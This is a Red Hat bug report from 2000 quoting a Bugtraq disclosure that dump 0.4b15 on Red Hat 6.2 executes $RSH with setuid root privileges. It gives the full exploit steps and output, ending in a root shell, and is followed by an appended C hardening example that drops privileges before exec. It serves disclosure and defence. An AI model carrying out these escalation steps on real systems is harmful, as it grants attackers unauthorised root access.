Bug 20112 - dump executes $RSH with root privs
Status: CLOSED DUPLICATE of bug 20111
Product: Red Hat Linux
Classification: Retired
Component: dump
Version: 6.2
Hardware: All
OS: Linux
Priority: high
Severity: medium
Assigned To: Preston Brown
QA Contact: Dale Lovelace
Keywords: Security
Reported: 2000-10-31 12:53 EST by Daniel Roesen
Modified: 2007-03-26 23:37 EDT
Last Closed: 2000-10-31 13:30:14 EST
Description Daniel Roesen 2000-10-31 12:53:38 EST
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Redhat 6.2 dump command executes external program with suid
         privilege.
Date: Tue, 31 Oct 2000 14:37:35 +0900

1. Problem:
 Linux dump command executes external program with suid privilege.
2. Tested Version
 dump-0.4b15
3. Example
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
  DUMP: Connection to garbage established.
  DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
  DUMP: Date of last level 0 dump: the epoch
  DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
  DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x    1 root     tty        316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
=================================================
|                                               |
|               mat@hacksware.com               |
|                                               |
=================================================
Comment 1 Daniel Roesen 2000-10-31 13:02:06 EST
WTF is dump on RH <7 setuid root anyway? RH7 dump is chmod 755 as it should be.
Comment 2 Daniel Roesen 2000-10-31 13:30:11 EST
And another question: as Red Hat decided to remove the suid bit on RH7
(obviously because of security concerns), why didn't we see a security errata
update for RH 6.x at the time this decision was made? Do all vulnerabilities
have to get exploited and/or posted to BugTraq before actions get taken?

Admitted, I'm "a little bit" pissed right now.
Comment 3 Daniel Roesen 2000-10-31 15:56:32 EST
Closing this report as duplicate... phr@doc.ic.ac.uk was a minute faster than 
me :-]

*** This bug has been marked as a duplicate of 20111 ***
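
The root cause reported above is a setuid binary that takes a helper path from the caller's environment and executes it while still privileged. The following is an added example, not dump's source and not the fix Red Hat shipped, of the usual hardening in C: ignore $RSH when real and effective ids differ, and drop privileges in the child before exec. The DEFAULT_RSH path and all function names are assumptions.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed compiled-in helper path; not taken from the report. */
static const char DEFAULT_RSH[] = "/usr/bin/rsh";

/* Decide which helper to run. An elevated process (real id != effective id)
 * must not let the caller's environment name the program. */
const char *choose_rsh(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid,
                       const char *env_rsh)
{
    int elevated = (ruid != euid) || (rgid != egid);
    if (elevated || env_rsh == NULL || env_rsh[0] != '/')
        return DEFAULT_RSH;
    return env_rsh;
}

/* Permanently return to the invoking user's ids: group first, then user. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    if (setgid(getgid()) != 0 || setuid(ruid) != 0)
        return -1;
    /* If root can be regained, the drop did not take effect. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return (geteuid() == ruid) ? 0 : -1;
}

/* Run the helper in a child that has shed privileges before exec.
 * Returns the child's exit status, or -1 on failure. */
int run_remote_helper(const char *host)
{
    const char *rsh = choose_rsh(getuid(), geteuid(), getgid(), getegid(),
                                 getenv("RSH"));
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);
        execl(rsh, rsh, host, (char *)NULL);
        _exit(127);               /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Either check alone would have stopped the copied shell from ending up setuid root; removing the setuid bit from the binary, as comment 1 notes RH7 did, removes the exposure entirely.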
